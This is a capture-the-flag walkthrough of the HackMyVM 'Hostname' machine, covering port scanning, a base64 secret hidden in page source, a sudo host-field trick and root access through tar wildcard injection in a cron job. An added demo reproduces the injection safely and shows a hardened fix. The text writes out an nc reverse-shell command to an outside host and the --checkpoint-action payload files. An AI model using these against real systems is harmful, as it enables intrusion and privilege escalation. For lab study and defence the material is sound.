NOTES ABOUT Hostname

[ 2022-10-07 ] [ HackMyVM / Hostname ]

Status: Rooted
Skills: Port Scanning, Static Code Analysis, Wildcard Command Injection, Reverse Shell, Sudo
Tools: nmap, nc

PORT SCANNING

  $ nmap -v -sS -A -p- 10.0.2.

  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
  | ssh-hostkey:
  |   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
  |   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
  |_  256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
  80/tcp open  http    nginx 1.18.0
  |_http-title: Panda
  |_http-server-header: nginx/1.18.0

GETTING IN

  $ curl -L http://10.0.2.17/

  [...]
  <div class="form-group">
    <input name="secret" required="required" class="form-control"/>
    <label class="form-label">Secret Word</label>
  </div>
  <div class="form-group">
    <p class="alert">Give Some Input..!!</p>
    <!-- Kung Fu Panda -->
    <button class="btn" name="username" disabled="po">Read</button>
  </div>
  </form>
  <link rel="stylesheet" href="./assets/cool.css"><br><br>
  <h2 style="font-size:4vw"><span>I</span>M<span>POSSIBLE</span></h2>
  <script crossorigin="S3VuZ19GdV9QNG5kYQ==" src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
  <script src="./assets/script.js"></script>

  $ echo "S3VuZ19GdV9QNG5kYQ==" | base64 -d
  Kung_Fu_P4nda

REMOVED “DISABLED” IN BUTTON TAG WITH FIREFOX DEVELOPER TOOLS (THE BUTTON IS NAMED “username” AND ITS DISABLED VALUE, “po”, IS THE USERNAME).

Pass: Kung_Fu_P4nda

  $ ssh po@10.0.2.17
  po@10.0.2.17's password: !ts-bl4nk

ELEVATING PRIVILEGES

  $ cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  [...]
  po:x:1000:1000::/home/po:/bin/bash
  oogway:x:1001:1001::/home/oogway:/bin/bash

  $ find / -name po 2>/dev/null
  /home/po
  /etc/sudoers.d/po
  /var/lib/sudo/lectured/po

  $ cat /etc/sudoers.d/po
  po HackMyVM = (oogway) NOPASSWD: /bin/bash
  # sudoers syntax: user host = (runas) tag: command. The host field is
  # "HackMyVM", not this box's hostname, so the rule only matches when that
  # host is supplied with -h (the machine's name is the hint).
  $ sudo -u oogway -h HackMyVM /bin/bash
  oogway@hostname:/$

  # quote the pattern so the shell does not expand *.txt before find sees it
  $ find / -name '*.txt' 2>/dev/null
  /home/oogway/user.txt

  $ cat /home/oogway/user.txt

  $ find / -writable 2>/dev/null
  /home/oogway
  /home/oogway/.bash_history
  /home/oogway/.bash_logout
  /home/oogway/.profile
  /home/oogway/.bashrc
  /home/po/.bash_history
  [...]
  /opt/secret

  $ grep -lir "/opt/secret" / 2>/dev/null
  /etc/crontab

  $ cat /etc/crontab
  [...]
  * * * * * root cd /opt/secret/ && tar -zcf /var/backups/secret.tgz *
  [...]
  # runs as root every minute, globs an unquoted * inside a directory that
  # oogway can write to: file names starting with "-" become tar options

"[...] bash expands * to be a list of the files and folders rather than passing it on the command [...]"

Tar arbitrary command execution [ WildCards_Gone_Wild.txt ]
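Added example, not part of the original writeup: the crontab command reproduced against a scratch directory as an unprivileged user, with a payload that only drops a marker file instead of calling back with nc, beside the hardened form that ends the option list with `--`. It assumes GNU tar (for `--checkpoint`) and gzip; the temporary directory layout and the `pwned` marker name are assumptions made for the demo.

```shell
#!/bin/sh
# Added example: reproduce "cd /opt/secret && tar -zcf ... *" in a scratch
# directory, without root or cron. Assumes GNU tar and gzip. The directory
# layout and the "pwned" marker file are assumptions for this demo.

# Same shape as the cron job: the shell expands * into the argument list,
# so file names beginning with "-" are parsed by tar as options.
vulnerable_backup() {
  ( cd "$1" && tar -zcf ../secret.tgz * ) 2>/dev/null
}

# Hardened form: "--" ends option parsing, so the same names are archived
# as plain operands. (Archiving "." instead of * avoids the problem too.)
hardened_backup() {
  ( cd "$1" && tar -zcf ../secret.tgz -- * ) 2>/dev/null
}

# Plant what the writeup plants in /opt/secret: a checkpoint on every
# record, an exec action that runs "sh rs", and the rs script itself.
# Here rs only creates the marker file $2 instead of spawning a shell.
plant_payload() {
  printf 'touch "%s"\n' "$2" > "$1/rs"
  touch -- "$1/--checkpoint=1"
  touch -- "$1/--checkpoint-action=exec=sh rs"
  echo "some secret" > "$1/data.txt"   # a legitimate file to back up
}

# Run one backup function ($1) against a freshly planted directory.
# Returns 0 if the payload executed (marker exists), 1 if it did not.
run_scenario() {
  local backup=$1 work rc=1
  work=$(mktemp -d) || return 2
  mkdir "$work/secret"
  plant_payload "$work/secret" "$work/pwned"
  "$backup" "$work/secret" || true
  if [ -e "$work/pwned" ]; then rc=0; fi
  rm -rf "$work"
  return "$rc"
}

# Demo: the unquoted glob runs the payload, the "--" form does not.
run_scenario vulnerable_backup && echo "tar ... *    : payload executed" \
                               || echo "tar ... *    : payload did not execute"
run_scenario hardened_backup   && echo "tar ... -- * : payload executed" \
                               || echo "tar ... -- * : safe, names archived as files"
```

The exec action runs with tar's working directory, which is why the cron job's `cd /opt/secret/` makes a relative `sh rs` work; the hardened variant archives files literally named `--checkpoint=1` and `--checkpoint-action=exec=sh rs` without interpreting them.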

NC LISTENER ON LOCAL PORT 80

  # as oogway, inside the directory the cron job globs; the target's nc supports -e
  $ cd /opt/secret
  $ echo "nc -e /bin/bash 10.0.2.15 80" > rs
  $ touch -- --checkpoint=1
  $ touch -- "--checkpoint-action=exec=sh rs"

WAIT FOR IT...

READ FLAG

  $ cat /root/root.txt

  $ init 0
